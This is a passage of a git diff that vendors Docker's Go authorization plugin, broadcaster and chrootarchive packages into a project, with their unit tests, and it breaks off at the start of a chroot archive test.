+ + // 
ResponseHeaders stores the response headers sent to the docker daemon + ResponseHeaders map[string]string `json:"ResponseHeaders,omitempty"` +} + +// Response represents authZ plugin response +type Response struct { + // Allow indicating whether the user is allowed or not + Allow bool `json:"Allow"` + + // Msg stores the authorization message + Msg string `json:"Msg,omitempty"` + + // Err stores a message in case there's an error + Err string `json:"Err,omitempty"` +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz.go b/vendor/github.com/docker/docker/pkg/authorization/authz.go new file mode 100644 index 0000000000..dc9a9ae56f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/authz.go @@ -0,0 +1,186 @@ +package authorization + +import ( + "bufio" + "bytes" + "fmt" + "io" + "net/http" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/ioutils" +) + +const maxBodySize = 1048576 // 1MB + +// NewCtx creates new authZ context, it is used to store authorization information related to a specific docker +// REST http session +// A context provides two method: +// Authenticate Request: +// Call authZ plugins with current REST request and AuthN response +// Request contains full HTTP packet sent to the docker daemon +// https://docs.docker.com/engine/reference/api/ +// +// Authenticate Response: +// Call authZ plugins with full info about current REST request, REST response and AuthN response +// The response from this method may contains content that overrides the daemon response +// This allows authZ plugins to filter privileged content +// +// If multiple authZ plugins are specified, the block/allow decision is based on ANDing all plugin results +// For response manipulation, the response from each plugin is piped between plugins. 
Plugin execution order +// is determined according to daemon parameters +func NewCtx(authZPlugins []Plugin, user, userAuthNMethod, requestMethod, requestURI string) *Ctx { + return &Ctx{ + plugins: authZPlugins, + user: user, + userAuthNMethod: userAuthNMethod, + requestMethod: requestMethod, + requestURI: requestURI, + } +} + +// Ctx stores a single request-response interaction context +type Ctx struct { + user string + userAuthNMethod string + requestMethod string + requestURI string + plugins []Plugin + // authReq stores the cached request object for the current transaction + authReq *Request +} + +// AuthZRequest authorized the request to the docker daemon using authZ plugins +func (ctx *Ctx) AuthZRequest(w http.ResponseWriter, r *http.Request) error { + var body []byte + if sendBody(ctx.requestURI, r.Header) && r.ContentLength > 0 && r.ContentLength < maxBodySize { + var err error + body, r.Body, err = drainBody(r.Body) + if err != nil { + return err + } + } + + var h bytes.Buffer + if err := r.Header.Write(&h); err != nil { + return err + } + + ctx.authReq = &Request{ + User: ctx.user, + UserAuthNMethod: ctx.userAuthNMethod, + RequestMethod: ctx.requestMethod, + RequestURI: ctx.requestURI, + RequestBody: body, + RequestHeaders: headers(r.Header), + } + + if r.TLS != nil { + for _, c := range r.TLS.PeerCertificates { + pc := PeerCertificate(*c) + ctx.authReq.RequestPeerCertificates = append(ctx.authReq.RequestPeerCertificates, &pc) + } + } + + for _, plugin := range ctx.plugins { + logrus.Debugf("AuthZ request using plugin %s", plugin.Name()) + + authRes, err := plugin.AuthZRequest(ctx.authReq) + if err != nil { + return fmt.Errorf("plugin %s failed with error: %s", plugin.Name(), err) + } + + if !authRes.Allow { + return newAuthorizationError(plugin.Name(), authRes.Msg) + } + } + + return nil +} + +// AuthZResponse authorized and manipulates the response from docker daemon using authZ plugins +func (ctx *Ctx) AuthZResponse(rm ResponseModifier, r 
*http.Request) error { + ctx.authReq.ResponseStatusCode = rm.StatusCode() + ctx.authReq.ResponseHeaders = headers(rm.Header()) + + if sendBody(ctx.requestURI, rm.Header()) { + ctx.authReq.ResponseBody = rm.RawBody() + } + + for _, plugin := range ctx.plugins { + logrus.Debugf("AuthZ response using plugin %s", plugin.Name()) + + authRes, err := plugin.AuthZResponse(ctx.authReq) + if err != nil { + return fmt.Errorf("plugin %s failed with error: %s", plugin.Name(), err) + } + + if !authRes.Allow { + return newAuthorizationError(plugin.Name(), authRes.Msg) + } + } + + rm.FlushAll() + + return nil +} + +// drainBody dump the body (if its length is less than 1MB) without modifying the request state +func drainBody(body io.ReadCloser) ([]byte, io.ReadCloser, error) { + bufReader := bufio.NewReaderSize(body, maxBodySize) + newBody := ioutils.NewReadCloserWrapper(bufReader, func() error { return body.Close() }) + + data, err := bufReader.Peek(maxBodySize) + // Body size exceeds max body size + if err == nil { + logrus.Warnf("Request body is larger than: '%d' skipping body", maxBodySize) + return nil, newBody, nil + } + // Body size is less than maximum size + if err == io.EOF { + return data, newBody, nil + } + // Unknown error + return nil, newBody, err +} + +// sendBody returns true when request/response body should be sent to AuthZPlugin +func sendBody(url string, header http.Header) bool { + // Skip body for auth endpoint + if strings.HasSuffix(url, "/auth") { + return false + } + + // body is sent only for text or json messages + return header.Get("Content-Type") == "application/json" +} + +// headers returns flatten version of the http headers excluding authorization +func headers(header http.Header) map[string]string { + v := make(map[string]string, 0) + for k, values := range header { + // Skip authorization headers + if strings.EqualFold(k, "Authorization") || strings.EqualFold(k, "X-Registry-Config") || strings.EqualFold(k, "X-Registry-Auth") { + continue + } + 
for _, val := range values { + v[k] = val + } + } + return v +} + +// authorizationError represents an authorization deny error +type authorizationError struct { + error +} + +// HTTPErrorStatusCode returns the authorization error status code (forbidden) +func (e authorizationError) HTTPErrorStatusCode() int { + return http.StatusForbidden +} + +func newAuthorizationError(plugin, msg string) authorizationError { + return authorizationError{error: fmt.Errorf("authorization denied by plugin %s: %s", plugin, msg)} +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go new file mode 100644 index 0000000000..a787f3cd8c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/authz_unix_test.go @@ -0,0 +1,282 @@ +// +build !windows + +// TODO Windows: This uses a Unix socket for testing. This might be possible +// to port to Windows using a named pipe instead. + +package authorization + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net" + "net/http" + "net/http/httptest" + "os" + "path" + "reflect" + "strings" + "testing" + + "github.com/docker/docker/pkg/plugins" + "github.com/docker/go-connections/tlsconfig" + "github.com/gorilla/mux" +) + +const ( + pluginAddress = "authz-test-plugin.sock" +) + +func TestAuthZRequestPluginError(t *testing.T) { + server := authZPluginTestServer{t: t} + server.start() + defer server.stop() + + authZPlugin := createTestPlugin(t) + + request := Request{ + User: "user", + RequestBody: []byte("sample body"), + RequestURI: "www.authz.com/auth", + RequestMethod: "GET", + RequestHeaders: map[string]string{"header": "value"}, + } + server.replayResponse = Response{ + Err: "an error", + } + + actualResponse, err := authZPlugin.AuthZRequest(&request) + if err != nil { + t.Fatalf("Failed to authorize request %v", err) + } + + if !reflect.DeepEqual(server.replayResponse, *actualResponse) { + t.Fatal("Response must be equal") + 
} + if !reflect.DeepEqual(request, server.recordedRequest) { + t.Fatal("Requests must be equal") + } +} + +func TestAuthZRequestPlugin(t *testing.T) { + server := authZPluginTestServer{t: t} + server.start() + defer server.stop() + + authZPlugin := createTestPlugin(t) + + request := Request{ + User: "user", + RequestBody: []byte("sample body"), + RequestURI: "www.authz.com/auth", + RequestMethod: "GET", + RequestHeaders: map[string]string{"header": "value"}, + } + server.replayResponse = Response{ + Allow: true, + Msg: "Sample message", + } + + actualResponse, err := authZPlugin.AuthZRequest(&request) + if err != nil { + t.Fatalf("Failed to authorize request %v", err) + } + + if !reflect.DeepEqual(server.replayResponse, *actualResponse) { + t.Fatal("Response must be equal") + } + if !reflect.DeepEqual(request, server.recordedRequest) { + t.Fatal("Requests must be equal") + } +} + +func TestAuthZResponsePlugin(t *testing.T) { + server := authZPluginTestServer{t: t} + server.start() + defer server.stop() + + authZPlugin := createTestPlugin(t) + + request := Request{ + User: "user", + RequestURI: "someting.com/auth", + RequestBody: []byte("sample body"), + } + server.replayResponse = Response{ + Allow: true, + Msg: "Sample message", + } + + actualResponse, err := authZPlugin.AuthZResponse(&request) + if err != nil { + t.Fatalf("Failed to authorize request %v", err) + } + + if !reflect.DeepEqual(server.replayResponse, *actualResponse) { + t.Fatal("Response must be equal") + } + if !reflect.DeepEqual(request, server.recordedRequest) { + t.Fatal("Requests must be equal") + } +} + +func TestResponseModifier(t *testing.T) { + r := httptest.NewRecorder() + m := NewResponseModifier(r) + m.Header().Set("h1", "v1") + m.Write([]byte("body")) + m.WriteHeader(http.StatusInternalServerError) + + m.FlushAll() + if r.Header().Get("h1") != "v1" { + t.Fatalf("Header value must exists %s", r.Header().Get("h1")) + } + if !reflect.DeepEqual(r.Body.Bytes(), []byte("body")) { + 
t.Fatalf("Body value must exists %s", r.Body.Bytes()) + } + if r.Code != http.StatusInternalServerError { + t.Fatalf("Status code must be correct %d", r.Code) + } +} + +func TestDrainBody(t *testing.T) { + tests := []struct { + length int // length is the message length send to drainBody + expectedBodyLength int // expectedBodyLength is the expected body length after drainBody is called + }{ + {10, 10}, // Small message size + {maxBodySize - 1, maxBodySize - 1}, // Max message size + {maxBodySize * 2, 0}, // Large message size (skip copying body) + + } + + for _, test := range tests { + msg := strings.Repeat("a", test.length) + body, closer, err := drainBody(ioutil.NopCloser(bytes.NewReader([]byte(msg)))) + if err != nil { + t.Fatal(err) + } + if len(body) != test.expectedBodyLength { + t.Fatalf("Body must be copied, actual length: '%d'", len(body)) + } + if closer == nil { + t.Fatal("Closer must not be nil") + } + modified, err := ioutil.ReadAll(closer) + if err != nil { + t.Fatalf("Error must not be nil: '%v'", err) + } + if len(modified) != len(msg) { + t.Fatalf("Result should not be truncated. 
Original length: '%d', new length: '%d'", len(msg), len(modified)) + } + } +} + +func TestResponseModifierOverride(t *testing.T) { + r := httptest.NewRecorder() + m := NewResponseModifier(r) + m.Header().Set("h1", "v1") + m.Write([]byte("body")) + m.WriteHeader(http.StatusInternalServerError) + + overrideHeader := make(http.Header) + overrideHeader.Add("h1", "v2") + overrideHeaderBytes, err := json.Marshal(overrideHeader) + if err != nil { + t.Fatalf("override header failed %v", err) + } + + m.OverrideHeader(overrideHeaderBytes) + m.OverrideBody([]byte("override body")) + m.OverrideStatusCode(http.StatusNotFound) + m.FlushAll() + if r.Header().Get("h1") != "v2" { + t.Fatalf("Header value must exists %s", r.Header().Get("h1")) + } + if !reflect.DeepEqual(r.Body.Bytes(), []byte("override body")) { + t.Fatalf("Body value must exists %s", r.Body.Bytes()) + } + if r.Code != http.StatusNotFound { + t.Fatalf("Status code must be correct %d", r.Code) + } +} + +// createTestPlugin creates a new sample authorization plugin +func createTestPlugin(t *testing.T) *authorizationPlugin { + pwd, err := os.Getwd() + if err != nil { + t.Fatal(err) + } + + client, err := plugins.NewClient("unix:///"+path.Join(pwd, pluginAddress), &tlsconfig.Options{InsecureSkipVerify: true}) + if err != nil { + t.Fatalf("Failed to create client %v", err) + } + + return &authorizationPlugin{name: "plugin", plugin: client} +} + +// AuthZPluginTestServer is a simple server that implements the authZ plugin interface +type authZPluginTestServer struct { + listener net.Listener + t *testing.T + // request stores the request sent from the daemon to the plugin + recordedRequest Request + // response stores the response sent from the plugin to the daemon + replayResponse Response + server *httptest.Server +} + +// start starts the test server that implements the plugin +func (t *authZPluginTestServer) start() { + r := mux.NewRouter() + l, err := net.Listen("unix", pluginAddress) + if err != nil { + 
t.t.Fatal(err) + } + t.listener = l + r.HandleFunc("/Plugin.Activate", t.activate) + r.HandleFunc("/"+AuthZApiRequest, t.auth) + r.HandleFunc("/"+AuthZApiResponse, t.auth) + t.server = &httptest.Server{ + Listener: l, + Config: &http.Server{ + Handler: r, + Addr: pluginAddress, + }, + } + t.server.Start() +} + +// stop stops the test server that implements the plugin +func (t *authZPluginTestServer) stop() { + t.server.Close() + os.Remove(pluginAddress) + if t.listener != nil { + t.listener.Close() + } +} + +// auth is a used to record/replay the authentication api messages +func (t *authZPluginTestServer) auth(w http.ResponseWriter, r *http.Request) { + t.recordedRequest = Request{} + body, err := ioutil.ReadAll(r.Body) + if err != nil { + t.t.Fatal(err) + } + r.Body.Close() + json.Unmarshal(body, &t.recordedRequest) + b, err := json.Marshal(t.replayResponse) + if err != nil { + t.t.Fatal(err) + } + w.Write(b) +} + +func (t *authZPluginTestServer) activate(w http.ResponseWriter, r *http.Request) { + b, err := json.Marshal(plugins.Manifest{Implements: []string{AuthZApiImplements}}) + if err != nil { + t.t.Fatal(err) + } + w.Write(b) +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/middleware.go b/vendor/github.com/docker/docker/pkg/authorization/middleware.go new file mode 100644 index 0000000000..52890dd360 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/middleware.go @@ -0,0 +1,84 @@ +package authorization + +import ( + "net/http" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/plugingetter" + "golang.org/x/net/context" +) + +// Middleware uses a list of plugins to +// handle authorization in the API requests. +type Middleware struct { + mu sync.Mutex + plugins []Plugin +} + +// NewMiddleware creates a new Middleware +// with a slice of plugins names. 
+func NewMiddleware(names []string, pg plugingetter.PluginGetter) *Middleware { + SetPluginGetter(pg) + return &Middleware{ + plugins: newPlugins(names), + } +} + +// SetPlugins sets the plugin used for authorization +func (m *Middleware) SetPlugins(names []string) { + m.mu.Lock() + m.plugins = newPlugins(names) + m.mu.Unlock() +} + +// WrapHandler returns a new handler function wrapping the previous one in the request chain. +func (m *Middleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + + m.mu.Lock() + plugins := m.plugins + m.mu.Unlock() + if len(plugins) == 0 { + return handler(ctx, w, r, vars) + } + + user := "" + userAuthNMethod := "" + + // Default authorization using existing TLS connection credentials + // FIXME: Non trivial authorization mechanisms (such as advanced certificate validations, kerberos support + // and ldap) will be extracted using AuthN feature, which is tracked under: + // https://github.com/docker/docker/pull/20883 + if r.TLS != nil && len(r.TLS.PeerCertificates) > 0 { + user = r.TLS.PeerCertificates[0].Subject.CommonName + userAuthNMethod = "TLS" + } + + authCtx := NewCtx(plugins, user, userAuthNMethod, r.Method, r.RequestURI) + + if err := authCtx.AuthZRequest(w, r); err != nil { + logrus.Errorf("AuthZRequest for %s %s returned error: %s", r.Method, r.RequestURI, err) + return err + } + + rw := NewResponseModifier(w) + + var errD error + + if errD = handler(ctx, rw, r, vars); errD != nil { + logrus.Errorf("Handler for %s %s returned error: %s", r.Method, r.RequestURI, errD) + } + + if err := authCtx.AuthZResponse(rw, r); errD == nil && err != nil { + logrus.Errorf("AuthZResponse for %s %s returned error: %s", r.Method, r.RequestURI, err) + return err + } + + 
if errD != nil { + return errD + } + + return nil + } +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/plugin.go b/vendor/github.com/docker/docker/pkg/authorization/plugin.go new file mode 100644 index 0000000000..4b1c71bd4b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/plugin.go @@ -0,0 +1,112 @@ +package authorization + +import ( + "sync" + + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/plugins" +) + +// Plugin allows third party plugins to authorize requests and responses +// in the context of docker API +type Plugin interface { + // Name returns the registered plugin name + Name() string + + // AuthZRequest authorizes the request from the client to the daemon + AuthZRequest(*Request) (*Response, error) + + // AuthZResponse authorizes the response from the daemon to the client + AuthZResponse(*Request) (*Response, error) +} + +// newPlugins constructs and initializes the authorization plugins based on plugin names +func newPlugins(names []string) []Plugin { + plugins := []Plugin{} + pluginsMap := make(map[string]struct{}) + for _, name := range names { + if _, ok := pluginsMap[name]; ok { + continue + } + pluginsMap[name] = struct{}{} + plugins = append(plugins, newAuthorizationPlugin(name)) + } + return plugins +} + +var getter plugingetter.PluginGetter + +// SetPluginGetter sets the plugingetter +func SetPluginGetter(pg plugingetter.PluginGetter) { + getter = pg +} + +// GetPluginGetter gets the plugingetter +func GetPluginGetter() plugingetter.PluginGetter { + return getter +} + +// authorizationPlugin is an internal adapter to docker plugin system +type authorizationPlugin struct { + plugin *plugins.Client + name string + once sync.Once +} + +func newAuthorizationPlugin(name string) Plugin { + return &authorizationPlugin{name: name} +} + +func (a *authorizationPlugin) Name() string { + return a.name +} + +func (a *authorizationPlugin) AuthZRequest(authReq *Request) (*Response, error) { + 
if err := a.initPlugin(); err != nil { + return nil, err + } + + authRes := &Response{} + if err := a.plugin.Call(AuthZApiRequest, authReq, authRes); err != nil { + return nil, err + } + + return authRes, nil +} + +func (a *authorizationPlugin) AuthZResponse(authReq *Request) (*Response, error) { + if err := a.initPlugin(); err != nil { + return nil, err + } + + authRes := &Response{} + if err := a.plugin.Call(AuthZApiResponse, authReq, authRes); err != nil { + return nil, err + } + + return authRes, nil +} + +// initPlugin initializes the authorization plugin if needed +func (a *authorizationPlugin) initPlugin() error { + // Lazy loading of plugins + var err error + a.once.Do(func() { + if a.plugin == nil { + var plugin plugingetter.CompatPlugin + var e error + + if pg := GetPluginGetter(); pg != nil { + plugin, e = pg.Get(a.name, AuthZApiImplements, plugingetter.LOOKUP) + } else { + plugin, e = plugins.Get(a.name, AuthZApiImplements) + } + if e != nil { + err = e + return + } + a.plugin = plugin.Client() + } + }) + return err +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/response.go b/vendor/github.com/docker/docker/pkg/authorization/response.go new file mode 100644 index 0000000000..129bf2f417 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/authorization/response.go @@ -0,0 +1,203 @@ +package authorization + +import ( + "bufio" + "bytes" + "encoding/json" + "fmt" + "net" + "net/http" + + "github.com/Sirupsen/logrus" +) + +// ResponseModifier allows authorization plugins to read and modify the content of the http.response +type ResponseModifier interface { + http.ResponseWriter + http.Flusher + http.CloseNotifier + + // RawBody returns the current http content + RawBody() []byte + + // RawHeaders returns the current content of the http headers + RawHeaders() ([]byte, error) + + // StatusCode returns the current status code + StatusCode() int + + // OverrideBody replaces the body of the HTTP reply + OverrideBody(b []byte) + + // 
OverrideHeader replaces the headers of the HTTP reply + OverrideHeader(b []byte) error + + // OverrideStatusCode replaces the status code of the HTTP reply + OverrideStatusCode(statusCode int) + + // FlushAll flushes all data to the HTTP response + FlushAll() error + + // Hijacked indicates the response has been hijacked by the Docker daemon + Hijacked() bool +} + +// NewResponseModifier creates a wrapper to an http.ResponseWriter to allow inspecting and modifying the content +func NewResponseModifier(rw http.ResponseWriter) ResponseModifier { + return &responseModifier{rw: rw, header: make(http.Header)} +} + +// responseModifier is used as an adapter to http.ResponseWriter in order to manipulate and explore +// the http request/response from docker daemon +type responseModifier struct { + // The original response writer + rw http.ResponseWriter + // body holds the response body + body []byte + // header holds the response header + header http.Header + // statusCode holds the response status code + statusCode int + // hijacked indicates the request has been hijacked + hijacked bool +} + +func (rm *responseModifier) Hijacked() bool { + return rm.hijacked +} + +// WriterHeader stores the http status code +func (rm *responseModifier) WriteHeader(s int) { + + // Use original request if hijacked + if rm.hijacked { + rm.rw.WriteHeader(s) + return + } + + rm.statusCode = s +} + +// Header returns the internal http header +func (rm *responseModifier) Header() http.Header { + + // Use original header if hijacked + if rm.hijacked { + return rm.rw.Header() + } + + return rm.header +} + +// StatusCode returns the http status code +func (rm *responseModifier) StatusCode() int { + return rm.statusCode +} + +// OverrideBody replaces the body of the HTTP response +func (rm *responseModifier) OverrideBody(b []byte) { + rm.body = b +} + +// OverrideStatusCode replaces the status code of the HTTP response +func (rm *responseModifier) OverrideStatusCode(statusCode int) { + 
rm.statusCode = statusCode +} + +// OverrideHeader replaces the headers of the HTTP response +func (rm *responseModifier) OverrideHeader(b []byte) error { + header := http.Header{} + if err := json.Unmarshal(b, &header); err != nil { + return err + } + rm.header = header + return nil +} + +// Write stores the byte array inside content +func (rm *responseModifier) Write(b []byte) (int, error) { + + if rm.hijacked { + return rm.rw.Write(b) + } + + rm.body = append(rm.body, b...) + return len(b), nil +} + +// Body returns the response body +func (rm *responseModifier) RawBody() []byte { + return rm.body +} + +func (rm *responseModifier) RawHeaders() ([]byte, error) { + var b bytes.Buffer + if err := rm.header.Write(&b); err != nil { + return nil, err + } + return b.Bytes(), nil +} + +// Hijack returns the internal connection of the wrapped http.ResponseWriter +func (rm *responseModifier) Hijack() (net.Conn, *bufio.ReadWriter, error) { + + rm.hijacked = true + rm.FlushAll() + + hijacker, ok := rm.rw.(http.Hijacker) + if !ok { + return nil, nil, fmt.Errorf("Internal response writer doesn't support the Hijacker interface") + } + return hijacker.Hijack() +} + +// CloseNotify uses the internal close notify API of the wrapped http.ResponseWriter +func (rm *responseModifier) CloseNotify() <-chan bool { + closeNotifier, ok := rm.rw.(http.CloseNotifier) + if !ok { + logrus.Error("Internal response writer doesn't support the CloseNotifier interface") + return nil + } + return closeNotifier.CloseNotify() +} + +// Flush uses the internal flush API of the wrapped http.ResponseWriter +func (rm *responseModifier) Flush() { + flusher, ok := rm.rw.(http.Flusher) + if !ok { + logrus.Error("Internal response writer doesn't support the Flusher interface") + return + } + + rm.FlushAll() + flusher.Flush() +} + +// FlushAll flushes all data to the HTTP response +func (rm *responseModifier) FlushAll() error { + // Copy the header + for k, vv := range rm.header { + for _, v := range vv { + 
rm.rw.Header().Add(k, v) + } + } + + // Copy the status code + // Also WriteHeader needs to be done after all the headers + // have been copied (above). + if rm.statusCode > 0 { + rm.rw.WriteHeader(rm.statusCode) + } + + var err error + if len(rm.body) > 0 { + // Write body + _, err = rm.rw.Write(rm.body) + } + + // Clean previous data + rm.body = nil + rm.statusCode = 0 + rm.header = http.Header{} + return err +} diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go new file mode 100644 index 0000000000..784d65d6fe --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go @@ -0,0 +1,49 @@ +package broadcaster + +import ( + "io" + "sync" +) + +// Unbuffered accumulates multiple io.WriteCloser by stream. +type Unbuffered struct { + mu sync.Mutex + writers []io.WriteCloser +} + +// Add adds new io.WriteCloser. +func (w *Unbuffered) Add(writer io.WriteCloser) { + w.mu.Lock() + w.writers = append(w.writers, writer) + w.mu.Unlock() +} + +// Write writes bytes to all writers. Failed writers will be evicted during +// this call. +func (w *Unbuffered) Write(p []byte) (n int, err error) { + w.mu.Lock() + var evict []int + for i, sw := range w.writers { + if n, err := sw.Write(p); err != nil || n != len(p) { + // On error, evict the writer + evict = append(evict, i) + } + } + for n, i := range evict { + w.writers = append(w.writers[:i-n], w.writers[i-n+1:]...) + } + w.mu.Unlock() + return len(p), nil +} + +// Clean closes and removes all writers. Last non-eol-terminated part of data +// will be saved. 
+func (w *Unbuffered) Clean() error { + w.mu.Lock() + for _, sw := range w.writers { + sw.Close() + } + w.writers = nil + w.mu.Unlock() + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go new file mode 100644 index 0000000000..9f8e72bc0f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go @@ -0,0 +1,162 @@ +package broadcaster + +import ( + "bytes" + "errors" + "strings" + + "testing" +) + +type dummyWriter struct { + buffer bytes.Buffer + failOnWrite bool +} + +func (dw *dummyWriter) Write(p []byte) (n int, err error) { + if dw.failOnWrite { + return 0, errors.New("Fake fail") + } + return dw.buffer.Write(p) +} + +func (dw *dummyWriter) String() string { + return dw.buffer.String() +} + +func (dw *dummyWriter) Close() error { + return nil +} + +func TestUnbuffered(t *testing.T) { + writer := new(Unbuffered) + + // Test 1: Both bufferA and bufferB should contain "foo" + bufferA := &dummyWriter{} + writer.Add(bufferA) + bufferB := &dummyWriter{} + writer.Add(bufferB) + writer.Write([]byte("foo")) + + if bufferA.String() != "foo" { + t.Errorf("Buffer contains %v", bufferA.String()) + } + + if bufferB.String() != "foo" { + t.Errorf("Buffer contains %v", bufferB.String()) + } + + // Test2: bufferA and bufferB should contain "foobar", + // while bufferC should only contain "bar" + bufferC := &dummyWriter{} + writer.Add(bufferC) + writer.Write([]byte("bar")) + + if bufferA.String() != "foobar" { + t.Errorf("Buffer contains %v", bufferA.String()) + } + + if bufferB.String() != "foobar" { + t.Errorf("Buffer contains %v", bufferB.String()) + } + + if bufferC.String() != "bar" { + t.Errorf("Buffer contains %v", bufferC.String()) + } + + // Test3: Test eviction on failure + bufferA.failOnWrite = true + writer.Write([]byte("fail")) + if bufferA.String() != "foobar" { + t.Errorf("Buffer contains %v", bufferA.String()) + } + if 
bufferC.String() != "barfail" { + t.Errorf("Buffer contains %v", bufferC.String()) + } + // Even though we reset the flag, no more writes should go in there + bufferA.failOnWrite = false + writer.Write([]byte("test")) + if bufferA.String() != "foobar" { + t.Errorf("Buffer contains %v", bufferA.String()) + } + if bufferC.String() != "barfailtest" { + t.Errorf("Buffer contains %v", bufferC.String()) + } + + // Test4: Test eviction on multiple simultaneous failures + bufferB.failOnWrite = true + bufferC.failOnWrite = true + bufferD := &dummyWriter{} + writer.Add(bufferD) + writer.Write([]byte("yo")) + writer.Write([]byte("ink")) + if strings.Contains(bufferB.String(), "yoink") { + t.Errorf("bufferB received write. contents: %q", bufferB) + } + if strings.Contains(bufferC.String(), "yoink") { + t.Errorf("bufferC received write. contents: %q", bufferC) + } + if g, w := bufferD.String(), "yoink"; g != w { + t.Errorf("bufferD = %q, want %q", g, w) + } + + writer.Clean() +} + +type devNullCloser int + +func (d devNullCloser) Close() error { + return nil +} + +func (d devNullCloser) Write(buf []byte) (int, error) { + return len(buf), nil +} + +// This test checks for races. It is only useful when run with the race detector. 
+func TestRaceUnbuffered(t *testing.T) { + writer := new(Unbuffered) + c := make(chan bool) + go func() { + writer.Add(devNullCloser(0)) + c <- true + }() + writer.Write([]byte("hello")) + <-c +} + +func BenchmarkUnbuffered(b *testing.B) { + writer := new(Unbuffered) + setUpWriter := func() { + for i := 0; i < 100; i++ { + writer.Add(devNullCloser(0)) + writer.Add(devNullCloser(0)) + writer.Add(devNullCloser(0)) + } + } + testLine := "Line that thinks that it is log line from docker" + var buf bytes.Buffer + for i := 0; i < 100; i++ { + buf.Write([]byte(testLine + "\n")) + } + // line without eol + buf.Write([]byte(testLine)) + testText := buf.Bytes() + b.SetBytes(int64(5 * len(testText))) + b.ResetTimer() + for i := 0; i < b.N; i++ { + b.StopTimer() + setUpWriter() + b.StartTimer() + + for j := 0; j < 5; j++ { + if _, err := writer.Write(testText); err != nil { + b.Fatal(err) + } + } + + b.StopTimer() + writer.Clean() + b.StartTimer() + } +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go new file mode 100644 index 0000000000..a7814f5b90 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go @@ -0,0 +1,97 @@ +package chrootarchive + +import ( + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" +) + +var chrootArchiver = &archive.Archiver{Untar: Untar} + +// Untar reads a stream of bytes from `archive`, parses it as a tar archive, +// and unpacks it into the directory at `dest`. +// The archive may be compressed with one of the following algorithms: +// identity (uncompressed), gzip, bzip2, xz. 
+func Untar(tarArchive io.Reader, dest string, options *archive.TarOptions) error { + return untarHandler(tarArchive, dest, options, true) +} + +// UntarUncompressed reads a stream of bytes from `archive`, parses it as a tar archive, +// and unpacks it into the directory at `dest`. +// The archive must be an uncompressed stream. +func UntarUncompressed(tarArchive io.Reader, dest string, options *archive.TarOptions) error { + return untarHandler(tarArchive, dest, options, false) +} + +// Handler for teasing out the automatic decompression +func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions, decompress bool) error { + + if tarArchive == nil { + return fmt.Errorf("Empty archive") + } + if options == nil { + options = &archive.TarOptions{} + } + if options.ExcludePatterns == nil { + options.ExcludePatterns = []string{} + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) + if err != nil { + return err + } + + dest = filepath.Clean(dest) + if _, err := os.Stat(dest); os.IsNotExist(err) { + if err := idtools.MkdirAllNewAs(dest, 0755, rootUID, rootGID); err != nil { + return err + } + } + + r := ioutil.NopCloser(tarArchive) + if decompress { + decompressedArchive, err := archive.DecompressStream(tarArchive) + if err != nil { + return err + } + defer decompressedArchive.Close() + r = decompressedArchive + } + + return invokeUnpack(r, dest, options) +} + +// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. +// If either Tar or Untar fails, TarUntar aborts and returns the error. +func TarUntar(src, dst string) error { + return chrootArchiver.TarUntar(src, dst) +} + +// CopyWithTar creates a tar archive of filesystem path `src`, and +// unpacks it at filesystem path `dst`. +// The archive is streamed directly with fixed buffering and no +// intermediary disk IO. 
+func CopyWithTar(src, dst string) error { + return chrootArchiver.CopyWithTar(src, dst) +} + +// CopyFileWithTar emulates the behavior of the 'cp' command-line +// for a single file. It copies a regular file from path `src` to +// path `dst`, and preserves all its metadata. +// +// If `dst` ends with a trailing slash '/' ('\' on Windows), the final +// destination path will be `dst/base(src)` or `dst\base(src)` +func CopyFileWithTar(src, dst string) (err error) { + return chrootArchiver.CopyFileWithTar(src, dst) +} + +// UntarPath is a convenience function which looks for an archive +// at filesystem path `src`, and unpacks it at `dst`. +func UntarPath(src, dst string) error { + return chrootArchiver.UntarPath(src, dst) +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go new file mode 100644 index 0000000000..d2d7e621f5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go @@ -0,0 +1,394 @@ +package chrootarchive + +import ( + "bytes" + "fmt" + "hash/crc32" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "strings" + "testing" + "time" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" + "github.com/docker/docker/pkg/system" +) + +func init() { + reexec.Init() +} + +func TestChrootTarUntar(t *testing.T) { + tmpdir, err := ioutil.TempDir("", 